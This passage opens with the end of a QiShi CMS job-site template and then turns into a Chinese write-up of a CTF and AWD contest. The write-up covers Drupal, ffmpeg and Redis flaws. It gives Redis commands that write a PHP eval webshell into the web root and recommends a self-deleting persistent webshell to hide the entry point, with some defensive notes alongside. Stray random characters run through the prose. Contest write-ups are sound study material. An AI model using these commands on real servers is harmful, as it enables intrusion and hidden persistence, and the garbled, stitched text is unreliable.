<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 廣告 樓層廣告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img5,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
</div>
</div>
<!-- 列表-職位導(dǎo)航結(jié)束 -->
<!-- 列表-職場(chǎng)資訊 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">職場(chǎng)資訊<span>Workplace Information</span></h4>
<a href="{#"QS_news"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="job-news-block clearfix">
<div class="jn-left f-left">
{#qishi_news_category set="列表名:newscategory,資訊大類:1,顯示數(shù)目:4"#}
{#section loop=$newscategory name=nclist#}
<div class="jn-box f-left">
<div class="jn-img f-left"><a href="{#"QS_newslist,id:$newscategory[nclist].id"|qishi_url#}" target="_blank">![]({#$QISHI.site_template#}images/news{#$smarty.section.nclist.index#}.jpg)</a></div>
<ul class="jn-list f-left">
{#qishi_news_list set="列表名:topnews,顯示數(shù)目:4,標(biāo)題長(zhǎng)度:18,資訊小類:$newscategory[nclist].id,摘要長(zhǎng)度:36,填補(bǔ)字符:...,排序:id>desc"#}
{#foreach from=$topnews item=toplist#}
<li><i class="jn-icon"></i><a target="_blank" href="{#$toplist.url#}" class="underline" title="{#$toplist.title_#}" target="_blank">{#$toplist.title#}</a></li>
{#/foreach#}
</ul>
</div>
{#/section#}
</div>
<ol class="jn-right f-left">
{#qishi_news_list set="列表名:news_list,顯示數(shù)目:8,標(biāo)題長(zhǎng)度:12,填補(bǔ)字符:...,排序:click>desc"#}
{#section loop=$news_list name=nclist start=1#}
<li><span>{#$smarty.section.nclist.index#}</span><a href="{#$news_list[nclist].url#}" class="underline" target="_blank">{#$news_list[nclist].title#}</a></li>
{#/section#}
</ol>
</div>
</div>
<!-- 列表-職場(chǎng)資訊結(jié)束 -->
<!-- 列表-友情鏈接 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">友情鏈接<span>Friendly Link</span></h4>
<a href="{#$QISHI.site_dir#}link/add_link.php" target="_blank" class="f-right underline">申請(qǐng)>></a>
</div>
<div class="friendly-link">
{#qishi_link set="列表名:link,顯示數(shù)目:100,調(diào)用名稱:QS_index,類型:1"#}
{#foreach from=$link item=list#}
<a href="{#$list.link_url#}" target="_blank" class="underline">{#$list.title#}</a>
{#/foreach#}
</div>
{#qishi_link set="列表名:imglink,顯示數(shù)目:14,調(diào)用名稱:QS_index,類型:2"#}
{#if $imglink#}
<div class="link_img">
{#foreach from=$imglink item=list#}
<div class="l_img"><a href="{#$list.link_url#}" target="_blank">![]({#$list.link_logo#})</a> </div>
{#/foreach#}
<div class="clear"></div>
</div>
{#/if#}
</div>
<!-- 列表-友情鏈接結(jié)束 -->
</div>
<!-- 主體結(jié)束 -->
{#include file="footer.htm"#}
</body>
</html>
第三題easyCMS
- 這題也是服務(wù)器設(shè)置不當(dāng)導(dǎo)致部分目錄遍歷
- 進(jìn)入templates/admin目錄時(shí)發(fā)現(xiàn)title為flag
- 這題沒啥思路了Orz设塔。。远舅。闰蛔。希望大佬們能解答一下。图柏。序六。
下午的AWD不出所料又是一道Web題
但是圍繞這個(gè)Web題主辦方開放了三個(gè)服務(wù),分別是80端口的http服務(wù)爆办,8888端口的由python跑的http服務(wù)难咕,6379端口的redis服務(wù)
這里三個(gè)服務(wù)都各有一個(gè)洞(賽后詢問主辦方得知)
根據(jù)主辦方的賽前公告 getflag的方法是運(yùn)行位于/usr/tmp目錄下的getkey程序即可打印出flag,但是賽后問出題人其實(shí)還有另外一個(gè)地方有明文flag。余佃。暮刃。。爆土。椭懊。
首先80端口的一個(gè)Drupal反序列漏洞 ,鏈接 https://paper.seebug.org/334/?spm=5176.app55885.3.2.XT8Apf
防御方法:及時(shí)修改admin密碼其次8888端口是ffmpeg的任意文件讀取漏洞步势,emmm其實(shí)不知道這個(gè)有啥用氧猬。。坏瘩。但是后來問出題人盅抚。点额。他說本來他也沒想到這樣用的塔猾。。因?yàn)槠鋵?shí)服務(wù)器中還mount了一個(gè)虛擬硬盤倒堕,里面有明文的flag哪自,所以可以用這個(gè)直接讀取丰包。。壤巷。邑彪。//但是個(gè)人覺得這個(gè)洞。胧华。寄症。。貌似根本補(bǔ)不了矩动,沒有這個(gè)權(quán)限瘸爽。。铅忿。所以emmmmm 大家應(yīng)該懂
防御方法:其實(shí)這個(gè)洞后來想了一下剪决。。檀训「塘剩可以寫腳本無(wú)限訪問del去刪除,但是這個(gè)存在一個(gè)競(jìng)爭(zhēng)的問題峻凫,因?yàn)椴僮鳈C(jī)與別人攻擊的機(jī)器是處于水平網(wǎng)絡(luò)上的渗鬼,所以如果對(duì)面也寫腳本請(qǐng)求的話不一定能競(jìng)爭(zhēng)成功。荧琼。最后是6379端口的redis服務(wù)譬胎,我是拿了這個(gè)洞來打的差牛。。堰乔。今天下午又犯蠢了偏化。。ps aux發(fā)現(xiàn)redis之后很開心镐侯,興沖沖連上去發(fā)現(xiàn)不用密碼侦讨,輸入info命令可以看到redis的配置文件位于 /var/lib/redis/6379/xxx 然后查看自己的配置文件發(fā)現(xiàn)有幾個(gè)命令是被rename或者是移除的,比如migrate flushdb之類的 然后config命令被rename成了ccccooonnnnfig苟翻,shutdown被rename成了shutdown_123韵卤,然后加了自己的登錄密碼,自作聰明的上去把絕大多數(shù)人的redis down了崇猫,想著能美滋滋的收分沈条。。诅炉。拍鲤。。但是突然意識(shí)到這個(gè)awd是沒有checker的9!I谜狻澈魄!崩潰Orz。仲翎。痹扇。后來發(fā)現(xiàn)甚至有人把自己的80端口的服務(wù)都down掉了(不知道他們是如何做到的,因?yàn)椴惶釞?quán)的話根本不會(huì)有權(quán)限) 其實(shí)這里是可以用redis來進(jìn)行任意文件寫溯香, 因?yàn)閞edis是用root權(quán)限運(yùn)行的鲫构,而redis有一個(gè)save備份自身的kv對(duì)到文件的功能,也就是說玫坛,我可以執(zhí)行以下命令來進(jìn)行寫shell
> ccccooonnnnfig set dir /var/www/html/drupal8/
> ccccooonnnnfig set dbfilename Pr0ph3t.php
> set Pr0ph3t "<?php @eval($_POST['yoooooo']); ?>"
> save
save命令執(zhí)行之后 redis將會(huì)在80網(wǎng)站部署根目錄下生成一個(gè)內(nèi)容帶有Redis字樣的Pr0ph3t.php的文件
然后反彈shell之類的结笨,權(quán)限為deamon用戶
這里推薦寫一個(gè)unlink自身的不死馬,不會(huì)暴露是通過Redis服務(wù)寫的shell
防御方法:開啟redis的密碼 以下命令
> ccccooonnnnfig set requirepass 你的密碼
此命令設(shè)置后不用重啟服務(wù)即可生效
相關(guān)資料:https://www.leavesongs.com/penetration/write-webshell-via-redis-server.html
寫在最后:
其實(shí)這次比賽體驗(yàn)湿镀。炕吸。。大家心里都應(yīng)該會(huì)有數(shù)勉痴。赫模。。蒸矛。瀑罗。就不多說了胸嘴。。斩祭。劣像。